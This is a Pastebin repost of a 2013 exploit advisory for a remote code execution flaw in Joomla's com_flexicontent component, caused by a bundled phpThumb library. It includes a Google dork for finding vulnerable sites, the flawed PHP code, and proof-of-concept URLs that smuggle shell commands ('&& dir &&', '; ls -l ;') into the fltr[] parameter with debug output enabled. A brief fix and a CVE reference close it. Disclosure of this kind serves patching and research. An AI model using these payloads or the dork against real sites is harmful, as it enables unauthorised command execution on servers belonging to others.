API tools faq
paste
Advertisement
AndrewHaxalot

Joomla Flexicontent Remote Code Execution

AndrewHaxalot
Dec 9th, 2013
167
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.67 KB | None | 0 0
raw download clone embed print report
  1. # Exploit Title: Joomla com_flexicontent Remote Code Execution
  2. # Release Date: 08/12/2013
  3. # Author: Deepankar Arora And Rafay Baloch
  4. # Contact: http://rafayhackingarticles.net
  5. # Vendor: http://www.flexicontent.org/
  6. # Versions Affected: 2.1.3(Latest) and earlier
  7. # Google Dork: inurl:com_flexicontent
  8.  
  9. *----*
  10. *Description:*
  11.  
  12. The vulnerability with phpthumb with a known vulnerability, however it has
  13. been included with com_flexicontent package.
  14.  
  15. The exploit is nested in the "SafeExec" function, but the vulnerable
  16. parameter is passed to "ImageMagickThumbnailToGD".
  17.  
  18. The vulnerable code is as follows:
  19.  
  20. foreach ($this->fltr as $filterkey => $filtercommand) {
  21. @list($command, $parameter) = explode('|', $filtercommand, 2);
  22. switch ($command) {
  23. case 'blur':
  24.         if ($this->ImageMagickSwitchAvailable('blur')) {
  25.              @list($radius) = explode('|', $parameter);
  26.               $radius = ($radius ? $radius : 1);
  27.               $commandline .= ' -blur '.$radius;
  28.               unset($this->fltr[$filterkey]);
  29.          }
  30.         break;
  31.  
  32. $this->DebugMessage('ImageMagick called as ('.$commandline.')', __FILE__,
  33. __LINE__);
  34.  $IMresult = phpthumb_functions::SafeExec($commandline);
  35.  clearstatcache();
  36.  if (@$IMtempSourceFilename && file_exists($IMtempSourceFilename)) {
  37.       @unlink($IMtempSourceFilename);
  38.  }
  39.  
  40.  if (!@file_exists($IMtempfilename) || !@filesize($IMtempfilename)) {
  41.       $this->FatalError('ImageMagick failed with message
  42. ('.trim($IMresult).')');
  43.       $this->DebugMessage('ImageMagick failed with message
  44. ('.trim($IMresult).')', __FILE__, __LINE__);
  45.  
  46.  
  47. Here the vulnerable parameter is fltr[] as the params passed is exploded by
  48. the pipe (|) character, and that's where the code is passed.
  49. How the command is processed:
  50.  
  51. $output = array();
  52. $lastline = $execfunction($command, $output);
  53. $returnvalue = implode("\n", $output);
  54.  
  55.  
  56. As we can see the $command parameter is compiled with the imagemagick path,
  57. filename and parameters. Even the phpThumbDebug parameter gives us a
  58. console like account of everything imagemagick does as it executes.
  59.  
  60.  
  61. *----*
  62. *POC:*
  63.  
  64. *Windows-
  65. /components/com_flexicontent/librairies/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9
  66. -quality  75 -interlace line fail.jpg jpeg:fail.jpg %26%26 dir  %26%26
  67. &phpThumbDebug=9
  68.  
  69. *nix-
  70. /components/com_flexicontent/librairies/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9
  71. -quality  75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l ;
  72. &phpThumbDebug=9
  73.  
  74. *----*
  75. *Fix:*
  76.  
  77. Replace the phpthumb package being used with the latest version.
  78.  
  79. *----*
  80. *References:*
  81. http://www.cvedetails.com/cve/CVE-2010-1598/
  82.  
  83. *----*
  84. Warm Regards,
  85. Deepankar Arora and Rafay Baloch
  86. RHA Infosec
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!